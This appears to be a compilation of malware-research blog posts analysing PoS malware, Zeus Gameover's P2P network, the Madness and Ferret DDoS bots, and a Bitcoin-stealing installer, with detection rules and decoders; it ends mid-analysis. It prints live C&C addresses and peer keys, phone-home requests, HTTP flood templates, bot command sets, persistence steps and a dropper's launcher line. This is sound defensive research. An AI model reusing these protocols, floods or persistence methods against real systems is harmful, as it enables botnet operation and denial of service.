Dexter and Project Hook Point-of-Sale Malware Activity Update

By: cwilson -

An increase in credit and debit card theft via Point of Sale (PoS) malware campaigns over the late 2013 holiday season has resulted in significant media attention and has likely emboldened threat actors as the success of past campaigns comes to light. Media attention has decreased since news of the Target breach and the associated fallout; however, threat actors targeting PoS systems are still engaged in active attacks.

Point of Sale Malware Overview

Certain malware families, such as Dexter, Project Hook, Alina, ChewBacca, JackPoS and VSkimmer, have been written specifically to compromise Point of Sale machines. Other malware not designed specifically for PoS attacks, such as the ever-popular Citadel, has the capability to exfiltrate data from the target organization. In short, any system that holds credit/debit card data in clear text in memory or on disk, or sends clear-text card data over the network, is potentially at risk regardless of whether that machine is a PoS terminal or not.

In addition to Alina, Chewbacca, JackPoS and other Point of Sale malware, ASERT continues to track the Dexter and Project Hook PoS campaigns we originally reported on in December of 2013. Indicators suggest that Dexter Revelation may have been in existence as early as April 2013. A new ASERT threat intelligence brief linked at the end of this post provides a significant amount of updated material about Dexter and Project Hook including:

  • Additional actor insight
  • Reverse Engineering information
  • Potentially vulnerable Point of Sale solutions
  • An extensive list of file and network indicators
  • An analysis of possible attack vectors
  • An updated infection map
  • Mitigation suggestions

This information should prove valuable for incident responders and those responsible for protecting cardholder data environments. Additionally, since many of the network and file indicators have not been previously released, these indicators may be useful for identifying environments that are already compromised. The brief also provides scripts for decoding dump files that may help incident responders determine the scope of a compromise.

The following map shows Dexter and Project Hook infections as of January 24, 2014:

Project Hook_Dexter

Continued PoS campaign activity suggests that organizations still need to be vigilant. This new ASERT intelligence brief will help. The full document is available here.

*Author credits: Curt Wilson, Dave Loftus, and Dennis Schwarz

Pretending to be a Zeus Gameover Bot

By: Dennis Schwarz -

Zeus Gameover is a banking trojan that started appearing in the wild sometime in early 2012. As with Citadel, Ice IX, and KINS, it is based on the leaked Zeus trojan source code. The most significant difference between Gameover and its immediate family members is that it uses a peer-to-peer (P2P) network for its command and control (C&C). What also stands out is that there appears to be only one instance of the Gameover botnet, whereas Citadel for example has hundreds of distinct ones.

This post releases some proof of concept code (read: works for me) that helps malware researchers to further understand and also interact with Gameover. More specifically it:

  • Extracts the initial set of P2P peers (starter peers) from a Gameover memory dump
  • Queries each of the starter peers for their “P2P network configuration” file
  • Decrypts and partially parses the configuration into something more human readable
  • Enumerates part of the P2P network

Prior Work

The code is meant to complement the existing body of Gameover malware research. It takes bits and pieces from the following sources and ties them together into something a bit more tangible:

Much appreciation goes to these folks and their work.

Code Availability

Python code will be available on Arbor Networks' GitHub. It depends on the pefile Python module and requires a Gameover memory dump to operate on. The dump used in this demonstration came from a sample with an MD5 of 216b53fe8c704978468e8bfe1aad1152.

Please note that this is a live malware sample and the code has the ability to connect to and query a live malware C&C network! Stay safe.

Demonstration and Walk-Through

The walk-through data is initialized via:

>>> fp = open("AML-12420355.rsrc-52307867.dynamic.memdump", "rb")
>>> memdump = fp.read()
>>> fp.close()
>>>
>>> from ZeusGameover import ZeusGameover
>>> gameover = ZeusGameover(memdump)

or

$ python ZeusGameover.py AML-12420355.rsrc-52307867.dynamic.memdump

First off, a hardcoded “sample configuration” file is extracted from the memory dump and de-XOR’d with a key stored in the relocation section (.reloc) of the binary (see the get_memdump_config function). This configuration file contains an RC4 key state used later to decrypt the “P2P network configuration” file:

>>> rc4_key = gameover.get_memdump_rc4_key()
>>> print "".join(rc4_key).encode("hex")
<rc4 key state as hex>

The “sample configuration” file also contains the starter peers used to bootstrap communications with the P2P network (see the get_static_peers function):

static peer #1
ip: 74.96.168.126, udp port: 6710, rc4 key: c2056f859dd9fdf008507a637a0da568d16f825b

static peer #2
ip: 74.203.254.118, udp port: 6630, rc4 key: c046b43fbcec2475831083aa56aef3d5b72ceda6

static peer #3
ip: 70.30.53.56, udp port: 8204, rc4 key: a398bc30c436194c025513cb4bcafc1287460293

Using their respective UDP ports and RC4 keys, each of the starter peers is sent a “version” query to see if the peer is still alive. If so, the query will return version information and a TCP port (see the query_peer_for_version function):


static peer #8
ip: 85.100.41.9, udp port: 8835, rc4 key: d6c0d41b51dcb4b76205f3ab00f50af4411a22b9
binary version: 70314355, config version: 76101317, tcp port: 2997

If the TCP port is active, it is queried for the “P2P network configuration” file (see the query_peer_for_config and parse_config_response functions):


static peer #9
ip: 94.247.29.186, udp port: 3415, rc4 key: a5f5957b3acc687da57e5287837ea70c9ef827f6
binary version: 70314355, config version: 76101317, tcp port: 4948
config saved (1033680 actual bytes)

The “P2P network configuration” file is decrypted with the RC4 key state from above and lightly parsed. Parsing includes de-XORing and, if necessary, zlib decompressing the individual data “sections” of the config (see the parse_config function):

$ strings 94.247.29.186.config

[start item number: 22003, type: 0x10000001, packed size: 854, unpacked size: 2201]
@https://bancopostaimpresaonline.poste.it/bpiol/lastFortyMovementsBalance.do?method=loadLastFortyMovementList
@https://*.tecmarket.it/*
@https://www3.csebo.it/*
@https://qweb.quercia.com/*

[start item number: 2, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/s_c.php

[end item number: 2]
[start item number: 3, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/g_c.php


[start item number: 14, type: 0x40000001, packed size: 196, unpacked size: 298]
ERCPQ
inject
<script type="text/javascript" src="scripts/service?id=7" language="JavaScript"></script>S
ERCPM
inject
style=’visibility:hidden’
[end item number: 14]

Over time, the "P2P network configuration" can be queried via new Gameover samples, and a timeline of when changes are made and where they appear starts to emerge:

gameover_configs

$ diff -u jan_25.config.strings jan_28.config.strings
--- jan_25.config.strings 2014-01-29 15:59:54.000000000 -0500
+++ jan_28.config.strings 2014-01-29 15:59:41.000000000 -0500

[start item number: 1, type: 0x40000000, packed size: 39, unpacked size: 39]
-http://nessura.com/oz/service.php
+http://kessura.com/oz/service.php
[end item number: 1]

In addition to the configuration data, the starter peers can be used to further enumerate the P2P network (see the enumerate_peers function):


peer #21
ip: 115.162.112.200, udp port: 5782, rc4 key: d29e52a567b266b53c8269433c5462c2cf0c4fdd

peer #22
ip: 64.25.199.1, udp port: 6977, rc4 key: d75dfdb4f96e623546940e8a8c03872e07eed9d2

peer #88
ip: 99.190.124.179, udp port: 1671, rc4 key: d3526a00abf536c6a1df7d8607c9635c0bd98dc1

peer #89
ip: 153.160.176.252, udp port: 4714, rc4 key: d27382dbec8a01a3c4b405e063a1c10267313d19

From a set of twenty starter peers and using a breadth-first search, an interesting pattern emerges:

breadth_first

This graph shows how many total unique peers are at each level of the enumeration. While this certainly does not represent the entire Gameover P2P network, it does start to give an idea of its size and scope. Thanks to Kenny MacDermid for the above idea and help on the visual.
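As an added illustration (not part of the released tool or the original post), the following Python computes the per-level counts behind a graph like the one above with a breadth-first walk over peers identified by (ip, udp port). The peer graph is constructed here with RFC 5737 addresses and stands in for live peer-list replies; the real tool's UDP version queries are not reproduced, and a peer that does not answer is simply treated as returning no neighbours.

```python
# Constructed stand-in for live peer-list replies (RFC 5737 addresses, not real bots):
# key = (ip, udp_port) of the queried peer, value = peers it reports, None = no answer.
CONSTRUCTED_PEER_GRAPH = {
    ("192.0.2.1", 6710): [("192.0.2.2", 6630), ("192.0.2.3", 8204), ("192.0.2.4", 8835)],
    ("192.0.2.2", 6630): [("192.0.2.4", 8835), ("192.0.2.5", 3415)],
    ("192.0.2.3", 8204): [("192.0.2.1", 6710), ("192.0.2.6", 5782)],
    ("192.0.2.4", 8835): None,                      # dead peer: never answers the version query
    ("192.0.2.5", 3415): [("192.0.2.6", 5782), ("192.0.2.7", 6977)],
    ("192.0.2.6", 5782): [],
    ("192.0.2.7", 6977): [("192.0.2.8", 1671)],
    ("192.0.2.8", 1671): [],
}


def query_peer_list(peer, graph=CONSTRUCTED_PEER_GRAPH):
    """Stand-in for the live UDP exchange; a silent or unknown peer yields an empty list."""
    return graph.get(peer) or []


def enumerate_peers(starter_peers, query=query_peer_list, max_depth=8):
    """Breadth-first walk outward from the starter peers.

    Peers are identified by (ip, udp_port) so a node announced by several
    neighbours is counted once. Returns (all_unique_peers, new_peers_per_level),
    where level 0 is the (de-duplicated) starter set itself.
    """
    frontier = list(dict.fromkeys(starter_peers))  # de-duplicate, keep order
    seen = set(frontier)
    new_per_level = [len(frontier)]
    for _ in range(max_depth):
        next_frontier = []
        for peer in frontier:
            for neighbour in query(peer):
                if neighbour not in seen:
                    seen.add(neighbour)
                    next_frontier.append(neighbour)
        if not next_frontier:
            break
        new_per_level.append(len(next_frontier))
        frontier = next_frontier
    return seen, new_per_level


if __name__ == "__main__":
    starters = [("192.0.2.1", 6710), ("192.0.2.2", 6630)]
    peers, per_level = enumerate_peers(starters)
    for depth, count in enumerate(per_level):
        print("level %d: %d new unique peers" % (depth, count))
    print("total unique peers: %d" % len(peers))
```

Swapping `query_peer_list` for a function that performs the real "give me your peers" exchange turns this into the live enumeration; the `max_depth` cap keeps a run against a large network bounded.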

Conclusion

Zeus Gameover is a banking trojan that has been around for a couple of years now. It continues to be very active and as of this writing is in ASERT’s top five of tagged malware samples. This is interesting because Gameover is also a well-researched malware family. Usually the longer a family exists and the more focus the malware research community gives it, the less active the malware becomes. But, Gameover continues to be in the limelight and continues to infect and affect a large number of people and companies across the Internet.

This post hopes to complement and further the existing malware research into Gameover. In addition, it hopes to also assist enterprises and service providers to detect and mitigate infected peers and banks and financial institutions to determine if and how they are being targeted.

Can I Play with Madness?

By: Jason Jones -

Madness Pro is a relatively recent DDoS bot, first seen by ASERT in the second half of 2013 and also profiled by Kafeine in October 2013. Kafeine's blog post gave good insight into one method of infection and how quickly a potent DDoS botnet can be built. This post will take a deeper dive into what Madness does upon infection of a system and what its attack capabilities are.

Installation

Madness uses standard methods to achieve persistence on the system and evade detection. For persistence, it sets up autorun via:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run if the user does not have admin privileges
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run if the user does have admin privileges, falling back to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run if that fails

It also creates 4 files in the user's home folder named per, perper, perperper and perperperper (hint: search for these filenames on malwr.com to find more samples :) ). Each contains one of the registry keys above followed by [7] and [8] (the regini permission codes for WORLD_FULL_ACCESS and WORLD_READ_ACCESS), and regini is run on each file to set the permissions on those registry keys before the autorun entries are written. A mutex named GH5K-GKL8-CPP4-DE24 is also created to block multiple installations of Madness (since the mutex we have observed has been the same across all samples we have encountered, it also blocks competitors). It then attempts to bypass the Windows firewall on XP/Vista/7/8 by stopping the firewall service and then disabling autostart of that service.

Many of the interesting strings are encoded with Base64, which include the above-mentioned registry keys, commands, mutex values and operating system names. This makes many of the strings very recognizable and easy to identify with a Yara rule. One example rule has been committed to our GitHub repository.

Capabilities

Capability-wise, Madness Pro has a large number of DDoS attacks and a download-and-execute command. The latest version we have observed in the wild is 1.15. The network phone-homes for Madness resemble the Wireshark screenshot below. They include uid, a unique randomly generated bot ID; ver, the bot version; the mk parameter; os, the OS version; rs, the privilege level on the system; c, a counter of the number of phone-homes; and rq, a counter of the number of successful attack payloads sent since the last phone-home. The response from the server is a base64-encoded, newline-separated list of commands. Multiple targets can be specified per command by separating them with a semicolon.

Madness Phone-Home


I also wrote a Suricata / Snort rule to detect these phone-homes:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[ASERT] TROJAN W32/Madness Checkin"; flow:established,to_server; content:"GET"; http_method; content:"?uid="; pcre:"/\?uid\x3d[0-9]{8}\x26ver\x3d[0-9]\.[0-9]{2}\x26mk\x3d[0-9a-f]{6}\x26os\x3d[A-Za-z0-9]+\x26rs\x3d[a-z]+\x26c\x3d[0-9]+\x26rq\x3d[0-9]+/"; reference:url,www.arbornetworks.com/asert/2014/01/can-i-play-with-madness/; reference:md5,3e4107ccf956e2fc7af171adf3c18f0a; classtype:trojan-activity; sid:3000001; rev:1;)
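As an added example (not from the original post or the ASERT rule set), here is the same field grammar as the rule above expressed in Python and run over a few constructed request lines, together with a decoder for the base64-encoded, newline-separated reply described above. The sample request lines and the reply are constructed here; the space between a command name and its target list is an assumption, since the post does not show a raw reply.

```python
import base64
import re

# Field grammar lifted from the Snort/Suricata rule above (\x3d is '=', \x26 is '&'),
# applied to the query string of the request line rather than to raw packet bytes.
MADNESS_CHECKIN = re.compile(
    r"\?uid=(?P<uid>[0-9]{8})&ver=(?P<ver>[0-9]\.[0-9]{2})&mk=(?P<mk>[0-9a-f]{6})"
    r"&os=(?P<os>[A-Za-z0-9]+)&rs=(?P<rs>[a-z]+)&c=(?P<c>[0-9]+)&rq=(?P<rq>[0-9]+)"
)


def match_checkin(request_line):
    """Return the check-in fields as a dict, or None when the line is not a Madness check-in."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":      # the rule only fires on GET
        return None
    found = MADNESS_CHECKIN.search(parts[1])
    if found is None:
        return None
    fields = found.groupdict()
    fields["c"] = int(fields["c"])                 # phone-home counter
    fields["rq"] = int(fields["rq"])               # attack payloads since last phone-home
    return fields


def scan_request_lines(lines):
    """Run the check over HTTP request lines (e.g. from a proxy log); return (line_no, fields) hits."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = match_checkin(line)
        if fields is not None:
            hits.append((number, fields))
    return hits


def parse_command_response(body):
    """Decode a C&C reply: base64, one command per line, targets separated by ';',
    optional flood text after '@@@'. The single space between the command name and the
    target list is an assumption; the post does not show the raw layout of a reply."""
    commands = []
    for line in base64.b64decode(body).decode("ascii").splitlines():
        if not line.strip():
            continue
        name, _, rest = line.partition(" ")
        target_part, _, flood_text = rest.partition("@@@")
        targets = [t for t in target_part.split(";") if t]
        commands.append({"cmd": name, "targets": targets, "flood_text": flood_text or None})
    return commands


# Constructed sample data (not from a real capture): three request lines as a web proxy
# would log them, and one C&C reply built here so the block runs offline.
SAMPLE_REQUEST_LINES = [
    "GET /stat.php?uid=48213907&ver=1.15&mk=3f9a1c&os=WindowsXP&rs=admin&c=12&rq=0 HTTP/1.1",
    "GET /index.php?uid=48213907&ver=1.15 HTTP/1.1",          # uid but not the full field set
    "GET /api/v2/profile?uid=12&name=alice HTTP/1.1",          # benign use of a uid parameter
]
SAMPLE_RESPONSE = base64.b64encode(
    b"dd2 http://192.0.2.10/;http://192.0.2.11/login@@@flud_text\nwtf"
).decode("ascii")

if __name__ == "__main__":
    for number, fields in scan_request_lines(SAMPLE_REQUEST_LINES):
        print("line %d: Madness %s check-in, uid=%s rs=%s" % (number, fields["ver"], fields["uid"], fields["rs"]))
    for command in parse_command_response(SAMPLE_RESPONSE):
        print(command)
```

The regular expression is deliberately as strict as the rule: a request that carries a `uid` parameter but not the whole ordered field set does not match, which keeps ordinary web applications that happen to use `uid` out of the alerts.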

The DDoS attacks use a combination of WinSock, WinInet (InternetOpenRequestA + HttpSendRequestA), and UrlMon (URLDownloadToFileA) functions. The identified commands are shown below:

exe   - download and execute file
wtf   - stop attacks
dd1   - GET flood using WinSock
dc1   - AntiCookie GET flood using WinSock
ds1   - Slow GET flood using WinSock
dd2   - POST flood using WinSock
dd3   - GET flood using WinInet
dd4   - POST flood using WinInet
dd5   - ICMP flood using WinSock
dd6   - UDP flood using WinSock
dd7   - HTTP flood using URLDownloadToFileA

The POST and UDP floods both support specification of flood text by appending ‘@@@’ and then the flood text (default is ‘flud_text’). The Cookie recognition code will look for document.cookie and cookies specified of the form ["cookie","realauth=<value>","location"] and attempt to parse the value out.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]

The flood template for the WinSock POST request is below, note that the Referer and Cookie headers are only included in the attack if there are referer and cookie values. The user-agent will be incrementally selected from the list above (although the AntiCookie code has a small bug :) ). The WinSock GET and AntiCookie GET attacks use similar templates sans the POST data and of course with the GET HTTP verb instead of POST HTTP verb.

POST <uri> HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: <target>
Content-Length: <length>
User-Agent: <user-agent from list>
Referer: <referer>
Cookie: <cookie>
Cache-Control: no-cache
Connection: Keep-Alive

<post data>

The Slow GET flood only sends the GET request line and a Host header, sleeps for 100 milliseconds, and then sends the \r\n\r\n to finish the request.

The UDP and ICMP floods are pretty standard compared to most other DDoS bots. The download and execute command functionality has been used sparingly from the CnCs that we have tracked, except for….

Playing with Madness

Sometimes a botnet admin mistakenly gives you an FTP download link with server credentials that allows for retrieval of an intact panel, including credentials for the admin area of the web panel. Fortunately, this admin only had a total of 10 bots and at least 3 of those were researchers :). There's not much more to the admin panel than what is shown in the screenshot below:

Madness Panel 1.13


Madness Symbols


Sometimes the malware author forgets to run 'strip' on the binaries he's generating for customers, and these end up in my hands. Unfortunately that happened only after I had finished my initial reversing, but I was able to validate my analysis and also identify a few things I had not noticed before. One interesting function, WinSockGetAntiCookies, was not referenced by any calls in that version; it has since been wired in as the dc1 attack in the latest version, 1.15.

We've also had Madness in our botnet tracking system for a number of months and have some interesting data on some of the sites that have been targeted. One of the most popular targets appears to be the "underground" forum fuckav.ru, but the botnets do not appear to be very large, as the availability of the site does not appear to be affected very much. The locations of the CnCs tracked are fairly geographically disparate; locations where we have found CnCs hosted include the United States, Russia, Slovakia, the Netherlands, and France.

Conclusion

Given the breadth of the DDoS attacks available in Madness and the ability to attack large numbers of targets at the same time, it does not appear that Madness will be going away anytime soon in the DDoS space. A number of very active CnCs have been observed so far, and we can only expect to see more in the future.

Related MD5:
cc303da2c4b7a031d578c1dbf5af1970
027dcd2e6d231598c47557bdea98843d
60c77216bfcc21a2b993ca7e688f5b20
df99277fb3946c0327f10dc1c501452c
3fb38453a63dca35c0e751a709485e2b
32187e96c5af1177c35813c17302babf

A Business of Ferrets

By: Dennis Schwarz -

Trojan.Ferret appeared on my radar thanks to a tweet by @malpush. The tweet revealed a URL that at the time of this writing was pointing to a command and control (C&C) panel that looked like this:

login

The logo alone convinced me to study this business of ferrets further. Coincidentally (for Arbor), it turns out that this malware is a DDoS bot.

Malware Sample

The sample analyzed can be found at malwr (MD5: 4fa91b76294d849d01655ffb72b30981).

It is written in Delphi and plays the following malware games: UPX packing, string obfuscation, anti-virtual machine, anti-debugging, self-modifying code, and process hollowing.

Based on the Delphi usage and the language used for part of the panel, this bot is likely of Russian origin.

Obfuscations

Trojan.Ferret uses two methods of obfuscation; both are a combination of base64 and XOR. Different keys are used for various sections. The first obfuscation method is used mostly for strings and can be decrypted with the following Python function:

import base64


def decrypt_strings(msg, key):
    # Layer 1 is base64. Layer 2 only touches the low nibble of each byte: it is
    # XORed with the low nibble of the repeating key byte and with the constant 0xa,
    # while the high nibble of the ciphertext byte is kept as-is.
    msg_no_b64 = bytearray(base64.b64decode(msg))

    plain_buf = []
    for i, enc_byte in enumerate(msg_no_b64):
        key_lsb = ord(key[i % len(key)]) & 0xf
        msg_lsb = enc_byte & 0xf

        c = msg_lsb ^ key_lsb
        d = c ^ 0xa

        msg_slsb = enc_byte & 0xf0
        plain_byte = msg_slsb ^ d

        plain_buf.append(chr(plain_byte))

    return "".join(plain_buf)

Here are some examples:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH")
'Kernel32.dll'

>>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH")
'GetModuleHandleA'

>>> decrypt_strings("dWpkbXFqZmxi", "mu#X")
'removeone'

>>> decrypt_strings("cn9tY3Nqf2d1", "mu#X")
'updatever'

>>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx")
'http://188.190.101.13/hor/input.php'

The second method is used mostly for C&C communications and can be cleaned up with the following Python function:

import base64


def decrypt_cnc(msg, key):
    # base64, then a plain repeating-key XOR (the observed key is the single byte "\x38")
    msg_no_b64 = bytearray(base64.b64decode(msg))

    plain_buf = []
    for offset, enc_byte in enumerate(msg_no_b64):
        plain_byte = enc_byte ^ ord(key[offset % len(key)])
        plain_buf.append(chr(plain_byte))

    return "".join(plain_buf)

Here are some examples:

>>> decrypt_cnc("ChYJCRhta3k=", "\x38")
'2.11 USA'

>>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "\x38")
'5 x86 A 0d 0h 7m 28s'

Command and Control

C&C is HTTP based. Two message types have been identified. The first is message type 0 or the “phone home” and looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded

m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=

Here’s what it looks like decrypted:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

Its POST parameters are:

  • m – Message type (0)
  • h – Hash based on computer name
  • p – Computer name
  • v – Version and locale
  • s – Windows version, architecture, user type, and uptime

The phone home response looks like:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN

Decrypted, it is the User-Agent used in the request:

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "\x38")
'Mozilla Gecko Firefox 25'

The second message type is 1 or “poll for commands”. It looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

And here it is decrypted:

m=1&h=18803769021711750776216376939

Its POST parameters are:

  • m – Message type (1)
  • h – Hash based on computer name

An example poll response is:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8

UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=

Decrypted:

>>> decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "\x38")
'httpflood*http://target.net/index.php/*80*150*0'

Commands are delimited by “*”s and are formatted like:

command*arg1*arg2*arg3*arg4*arg5*arg6*arg7
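As an added example (not part of the original post), the following Python reassembles the two captured messages above into a small decoder: it decrypts every POST parameter with the same XOR-and-base64 step as decrypt_cnc, maps the single-letter parameter names to the meanings listed above, and splits a poll response on the "*" delimiter. The captured strings are the ones shown above; the longer field names in PHONE_HOME_FIELDS are labels chosen here, not names from the malware.

```python
import base64

# Repeating XOR key observed in the C&C traffic: the single byte 0x38. The XOR+base64
# step is the same transformation as decrypt_cnc() above, repeated so the block runs alone.
CNC_KEY = b"\x38"

# Parameter meanings as given in the post; the long names are labels chosen here.
PHONE_HOME_FIELDS = {
    "m": "message_type",
    "h": "host_hash",
    "p": "computer_name",
    "v": "version_locale",
    "s": "system_info",
}


def cnc_decrypt(b64_text, key=CNC_KEY):
    raw = base64.b64decode(b64_text)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(raw)).decode("latin-1")


def cnc_encrypt(plain, key=CNC_KEY):
    # XOR is symmetric, so the same loop produces what the bot puts on the wire.
    raw = plain.encode("latin-1")
    return base64.b64encode(bytes(b ^ key[i % len(key)] for i, b in enumerate(raw))).decode("ascii")


def decode_post_body(body):
    """Decrypt every parameter of a Ferret POST body into a name -> plaintext dict.

    The body is split by hand rather than with urllib.parse.parse_qs: the values are raw
    base64 whose '=' padding (and any '+' bytes) is not URL-encoded in the capture, and
    parse_qs would turn a '+' into a space and break the decode.
    """
    decoded = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        decoded[PHONE_HOME_FIELDS.get(name, name)] = cnc_decrypt(value)
    return decoded


def parse_command(b64_response):
    """Decrypt a poll response and split it on the '*' delimiter into (command, args)."""
    command, *args = cnc_decrypt(b64_response).split("*")
    return command, args


# Captured strings from the post: the message type 0 phone-home body and one poll response.
PHONE_HOME_BODY = ("m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ=="
                   "&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=")
POLL_RESPONSE = "UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg="

if __name__ == "__main__":
    for name, value in decode_post_body(PHONE_HOME_BODY).items():
        print("%-15s %s" % (name, value))
    print(parse_command(POLL_RESPONSE))
```

Because the key is a single byte, cnc_encrypt also lets a sinkhole or tracker build well-formed phone-homes and replies of its own; the phone-home response, for instance, is simply the User-Agent string passed through the same function.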

Commands

The following bot commands have been identified:

  • httpflood – HTTP GET flood
  • httppost – HTTP POST flood
  • udpflood – UDP flood
  • synflood – TCP connect flood
  • tcpflood – TCP flood
  • download – download and execute (all bots)
  • downloadone – download and execute (specified bot)
  • update – update (all bots)
  • updateos – update (specified OS)
  • updateone – update (specified bot)
  • updatever – update (specified version)
  • removeos – remove bot (specified OS)
  • removeone – remove bot (specified bot)
  • s! – stop all floods
  • su – stop UDP flood
  • sh – stop HTTP flood
  • ss – stop TCP SYN flood
  • st – stop TCP flood

More information about each command can be found in the “Task Management” section of the C&C panel:

tasks1

tasks2

Note: I didn’t see any references to the “memexec” or “script” commands in the analyzed binary.

C&C Panel

Wrapping up, here is a behind the scenes tour of the C&C panel; the “Statistic/Index” page:

index

Here is the “Uploads” page:

uploads

And, part of the “Bot List” page:

bots

Conclusions

This post has analyzed the crypto, C&C infrastructure, and command set of Trojan.Ferret, a new DDoS bot that is likely of Russian origin. At the time of this writing only a handful of unique samples and C&C servers have been identified, so the scope and impact of the new threat is still uncertain. ASERT will continue to track this business of ferrets, and any other new businesses that arise.

Bitcoin Alarm – Bitcoin stealing spam

By: Kenny MacDermid -

The rise in Bitcoin values seems to have caused an equal increase in Bitcoin spam as malware authors attempt to make money off the many new market participants. One site that was spammed to me three times in one day is bitcoin-alarm.net. I ignored it the first two times, but they must have really wanted me to look at it, so who am I not to oblige.

Bitcoin Alarm Logo

The site promises a tool to notify you of market changes by SMS, without ever mentioning any nefarious behaviour. YouTube videos teach you what Bitcoin is, and how to install this free tool. They even provide a link so you can donate to the author, although it appears no one has chosen to do so. This I have to download.

BitcoinAlarm Icon

The download BitcoinAlarm.exe (MD5: edfa12d4a454b0eb786bbe92050ab88a) had just 1 hit on VirusTotal when I first scanned it (from Kaspersky). Is it a false positive on a nice free tool? Let's dig deeper.

The download is an installer. A quick strings didn't turn up anything interesting, so let's try binwalk:

Binwalk Results - a rar archive
I carved out this RAR archive to see what it contains:

dd if=BitcoinAlarm.exe.virus of=out.rar bs=1 skip=756224
mkdir ext
unrar x out.rar ext/

Unrar results: an SFX script and 5 files.

There's an SFX script that runs on extraction; let's see what it does:

cat 7246235.vbe
CreateObject("WScript.Shell").Exec "winupdate.exe 5943564.IFW"

A quick check of winupdate.exe with VirusTotal shows that it’s the valid (and non-malicious) AutoIt executable. AutoIt is a great little scripting language for Windows, it’s especially useful for automating GUI related tasks. So if winupdate.exe is AutoIt that would make 5943564.IFW an AutoIt script. It looks like it was obfuscated somewhat though:

head 5943564.IFW
(output: a long run of junk comment lines, each beginning with ";" followed by digits)

Run it through

sed -e '/^;[0-9]/d'

to clean up the garbage and we end up with this script. It starts by checking if Avast is running and if so it sleeps for 20 seconds. I guess this is long enough for Avast to get bored and go look at something else:

if Avast, sleep for 20 seconds

Well, that’s certainly not a good sign. It’s a pretty solid chance that if software is checking for an antivirus engine that it’s up to no good. A scan of the rest of the file contains other interesting methods like “disable_uac”, “anti_hook”, “persistence”, “botkiller”, “downloader”, “disable_syste_restore”. It’s starting to look like Kaspersky was right, congrats on being the 1/49 to detect this.

I see a lot of calls to IniRead(), and they're all reading 65901.PPZ. It looks like this is the configuration file. It contains:

[6404000]
6662859=9455413
[2244034]
6224525=3244993
[3206254]
5598349=4588436
[5378250]
6296134=4064234
[1109091]
1109091=asvep

Matching these to the script, we find the sections are:

